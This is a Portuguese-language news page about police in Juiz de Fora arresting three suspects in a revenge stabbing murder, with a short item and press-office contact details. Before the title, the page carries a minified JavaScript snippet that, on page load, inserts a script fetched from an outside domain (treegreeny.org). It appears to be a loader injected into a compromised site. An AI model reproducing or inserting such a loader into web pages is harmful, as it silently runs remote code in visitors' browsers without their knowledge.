;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Polícia Civil prende trio suspeito de homicídio em Juiz de Fora. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Polícia Civil prende trio suspeito de homicídio em Juiz de Fora.

pcA Polícia Civil, por meio do 4º Departamento de Juiz de Fora e da Delegacia Especializada de Homicídios (DEH), apresentou, nesta quinta-feira (21), três homens, 18, 20 e 21 anos, suspeitos de serem autores do homicídio que vitimou Wilsimar Roque Moreira, 52 anos. Ele foi encontrado morto, no dia 21 de abril, com várias marcas de facadas, no Bairro Barbosa Lage.
Conforme o titular da Delegacia Especializada de Homicídios, Dr. Carlos Eduardo Santos Rodrigues, o crime foi motivado por vingança. “ Um dia antes, um tio de dois dos autores foi espancado por Wilsimar”, disse. Durante depoimento, eles contaram que bateram na vítima e a colocaram no carro de um quarto suspeito que se encontra foragido, depois esfaquearam o homem no local em que foi localizado. Ainda segundo o delegado, os três já foram presos por homicídio. Eles serão encaminhados ao Ceresp e as investigações continuam a fim de localizar o outro envolvido.
Durante entrevista coletiva, o chefe do 4º DEPPC, delegado geral Saed Divan, alertou sobre a necessidade de conscientização da sociedade em não se combater violência com violência. “ Não devemos fazer justiça com as próprias mãos. Precisamos confiar no trabalho da Polícia. A Delegacia Especializada de Homicídios tem trabalho muito no combate aos crimes, investigando e prendendo suspeitos”, destacou.

Glaciane Vitorino
Assessoria de Comunicação PCMG
Núcleo Avançado do 4º Departamento de Polícia em Juiz de Fora
Telefone:(32) 3692-5657/ (32)3692-5671/ (31) 9387-0118

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.